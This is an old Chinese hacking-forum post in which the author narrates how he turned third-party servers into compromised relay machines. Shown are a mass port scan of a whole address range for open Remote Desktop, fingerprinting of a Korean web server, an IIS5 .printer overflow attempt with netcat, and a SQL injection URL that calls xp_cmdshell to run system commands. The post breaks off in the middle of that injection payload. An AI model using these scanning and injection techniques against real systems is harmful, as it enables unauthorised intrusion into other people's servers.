楼主 跳转到 » 正序看帖
打印
tT
cycchina发表于 2005-11-27 11:00 | 只看该作者

[原创]找,黑,破,制作跳板肉鸡全过程

[watermark]前些时候作了一些破解VIP的工作,结果发现肉鸡太少,昨天晚上我开始制作肉鸡 第一步 扫描 Usage: s TCP/SYN StartIP [EndIP] Ports [Threads] [/Banner] [/Save] 这个扫描软件是我扫肉鸡的得力助手 _______________________________________________________________ Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. 中 =CYC= 国 D:\s>s tcp xx.xx.0.1 xx.xx.255.255 3389 50 /save D:\s>s tcp 10.0.0.1 10.0.0.10 80 /save TCP Port Scanner V1.1 By WinEggDrop Normal Scan: About To Scan 10.0.0.1:10 Using 80 Thread Scan xx.xx.xx.xx Complete In 3 Hours 34 Minutes 4 Seconds. Found 65536 Open Ports ________________________________________________________________ 这个软件 可以用 syn 和TCP 2种, SYN 速度快,有些人喜欢用它搜索肉鸡,但是我喜欢 TCP 因为比较稳定。看大家了。 这样,到 根目录下就会生成一个文件 Result 扫描的结果就在这里 要注意一点,就是后面的线程 要根据自己的机器和网络速度而定!!! 下面就是 Result 的结果 ------------------------------------------------------------------------------- Performing Time: 11/21/2005 10:41:56 --> Normal Scan: About To Scan 65536 IP For 1 Ports Using 300 Thread xx.xx.xx.xx 3389 open xx.xx.xx.xx 3389 open xx.xx.xx.xx 3389 open xx.xx.xx.xx 3389 open xx.xx.xx.xx 3389 open xx.xx.xx.xx 3389 open xx.xx.xx.xx 3389 open ....... 好,第二步了 通过我们得到的IP逐一攻克 首先找一个 xxx.xxx.xxx.69 让我们用溜光分析一下 (结果) 80(HTTP) 110(POP3) 443(HTTPS) 1433(MSSQL) 3389(TERMINAL) 25(SMTP) CGI扫描 WEB版本信息: Microsoft-IIS/5.0 WWW 标题: XXX (都是看不懂的韩文,还好我的同屋有一个韩国人,^_^) -------------------------------------------------------------------------------- Plugins IIS5.0 .Printer Exploit(Grant System Privileges) IIS 5.0 WEBDAV Exploit 第一眼我看见了80,这个是一个服务器了 其次是 1433 而且有漏洞,我到网上下了个iis5hack 配合NC 进行溢出 ———————————————————————————— Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. 中 =CYC= 国 D:\s>iis5hack XXX.XXX.XXX.69 80 7 1999 iis5 remote .printer overflow. writen by sunx http://www.sunx.org for test only, dont used to hack, :p connecting... ————————————————————————————— 然后开NC 这里面系统是我估计对方是win2k sp1 (后面证明了我是对的) 结果失败 大家不要放弃。。再来(已经很晚了,和朋友聊了聊天,给他发几个共享软件,然后就去睡觉了) 第2天 我针对 服务器的80 端口进行分析。首先我打开了他的网页。分析他的代码。还不错,估计是他们在别的网站DOWN下来的 没有什么漏洞 当我看到最后一页的新闻时候(新闻还是我同屋告诉我的,要不我也看不明白),发现了这个 http://XXX.XXX.XXX.69/wwwroot/wNewslist.asp?id=1278 利用简单的命令试验了一下 http://XXX.XXX.XXX.69/wwwroot/wNewslist.asp?keyno=1881;exec master.dbo.xp_cmdshell ';echo ^
返回列表 回复 发帖